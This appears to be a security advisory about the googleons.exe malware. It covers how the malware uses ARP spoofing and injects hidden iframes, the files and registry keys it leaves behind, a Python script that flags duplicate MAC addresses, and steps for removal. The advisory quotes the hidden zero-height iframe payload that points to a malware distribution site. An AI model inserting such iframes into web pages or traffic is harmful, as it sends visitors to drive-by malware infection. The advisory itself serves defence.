Title: Caution regarding malware that uses ARP Spoofing attacks
 
□ Overview

o Malware that spreads through ARP Spoofing and paralyzes the network once a host is infected has recently appeared in Korea, so caution is required
o In particular, network administrators should periodically check the internal network for ARP Spoofing attacks and identify the source of any attack, so that the related malware is not downloaded or executed


□ Propagation method

o A PC first infected with googleons.exe carries out an ARP Spoofing attack
- Once infected, it continuously sends ARP Replies to the hosts and the gateway on the network
- It continuously sends ARP Replies that forge the MAC address of the gateway and the MAC address of the targeted host

o Hosts connected to the same network as the infected PC are made to treat the infected PC as the gateway, so all of their packets can be monitored and modified
- Through the ARP Spoofing attack, when a normal host browses the web the infected PC intercepts the packets and inserts the following content, steering the host to the malware distribution site

"<iframe src="http://down.online"[omitted].net/page/image/zzh.htm height=0></iframe>"

o Among the PCs steered to the malware distribution site down.online[omitted].net, those without the following Windows vulnerability patches are infected with googleons.exe

- MS05-025
- MS06-014
- MS07-017
- MS07-027


□ Malicious behavior (googleons.exe)

o ARP Spoofing attack against the same network range as the infected PC

o Modification of the HTTP traffic of PCs on the same network
Inserts "<iframe src="http://down.online"[omitted].net/page/image/zzh.htm height=0></iframe>"

o Propagation of the malware via USB

o Insertion of the following malicious code into files with the .html, tml, asp, php, jsp extensions on the infected PC
- "<iframe src="http://down.online"[omitted].net/page/image/pd.htm height=0></iframe>"

o Files created on infection
- C:\Document and Settings\[account]\Local Settings\Temp\
autoexec.bat (down.exe, the initial-infection malware; downloads and runs googleons.exe)
googleons.exe
disocoo.exe (deleted after execution)
npptools.dll
Packet.dll
WanPacket.dll
yahoons.exe (deleted after execution)
- C:\windows\system32\ (files created when yahoons.exe runs)
dllhost32.exe
mh104.dll
moyu103.dll
mosou.exe
mydata.exe
nwizwmgjs.exe
nwizwmgjs.dll
nwizzhuxians.exe
nwizzhuxians.dll
RAV00xx.exe and many others

o Registration in the registry so that it restarts after boot
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Name : svc
- File name : googleons.exe


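□ Checking for infection and remediation

o Checking for infection
- Identify the infected PC from the L3 switch or router
Check for IPs with a duplicate MAC address (identifies the IP of the malware-infected host)
※ See the krcert homepage -> Technical documents -> "ARP Spoofing attacks and countermeasures"

- Identify the attacking PC from a PC affected by ARP Spoofing
Ping-scan the entire network
Check for IPs with a duplicate MAC address

※ See the krcert homepage -> Technical documents -> "ARP Spoofing attacks and countermeasures"

- Identify the PC that is infected with the malware and carrying out the ARP Spoofing attack
Check whether C:\Document and Settings\[account]\Local Settings\Temp\googleons.exe exists
Check whether the googleons.exe process is running [see the remediation steps below]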
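
The duplicate-MAC check described above, as an added example (not part of the original notice): it parses Windows `arp -a` output and reports unicast MAC addresses claimed by more than one IP. The sample table, its addresses and the gateway IP 192.168.0.1 are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output taken on a victim PC after a
# ping sweep. All addresses are made up; 192.168.0.1 is assumed to be the gateway.
SAMPLE_ARP_OUTPUT = """
Interface: 192.168.0.23 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-16-3e-aa-bb-07     dynamic
  192.168.0.7           00-16-3e-aa-bb-07     dynamic
  192.168.0.15          00-16-3e-11-22-33     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# One table row: IPv4 address, whitespace, MAC written with '-' or ':'.
ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}[-:]){5}[0-9a-f]{2})\b", re.I)

def is_group_mac(mac):
    """Broadcast/multicast MACs have the low bit of the first octet set; many
    IPs legitimately share them, so they are not evidence of spoofing."""
    return int(mac[:2], 16) & 1 == 1

def duplicate_macs(arp_text):
    """Return {mac: sorted IP list} for unicast MACs claimed by more than one IP."""
    by_mac = defaultdict(set)
    for line in arp_text.splitlines():
        m = ENTRY.match(line)
        if m and not is_group_mac(m.group(2)):
            by_mac[m.group(2).lower().replace(":", "-")].add(m.group(1))
    order = lambda ip: tuple(map(int, ip.split(".")))
    return {mac: sorted(ips, key=order) for mac, ips in by_mac.items() if len(ips) > 1}

def suspects(arp_text, gateway_ip):
    """IPs that share a MAC with the gateway's entry: hosts to inspect first."""
    for ips in duplicate_macs(arp_text).values():
        if gateway_ip in ips:
            return [ip for ip in ips if ip != gateway_ip]
    return []

if __name__ == "__main__":
    for mac, ips in duplicate_macs(SAMPLE_ARP_OUTPUT).items():
        print(f"{mac} is claimed by {', '.join(ips)}")
    print("sharing the gateway's MAC:", suspects(SAMPLE_ARP_OUTPUT, "192.168.0.1"))
```

A duplicate is a lead rather than proof: a single interface with several IP addresses, or proxy ARP, produces the same pattern, so confirm on the flagged host with the file and process checks listed above.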


o Remediation
- Delete the malware files under C:\Document and Settings\[account]\Local Settings\Temp\

- Delete the malware files in the Windows system folder

- End the googleons.exe process
Press "Ctrl" + "Alt" + "Del", then end the googleons.exe process from the Processes menu

- Delete registry entries
Delete the googleons restart registry entry
Select Start → Run, enter "regedit", then delete the entry the malware created under the following registry key
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Delete the registry entries of the other malware
Select Start → Run, enter "regedit", then delete the entries the malware created under the following registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run






□ Prevention

o Preventive measures against infection
- Apply the latest Windows OS patches


 
 
 
Copyright (C) 1995 - 2024 Netpia, Inc. All rights reserved.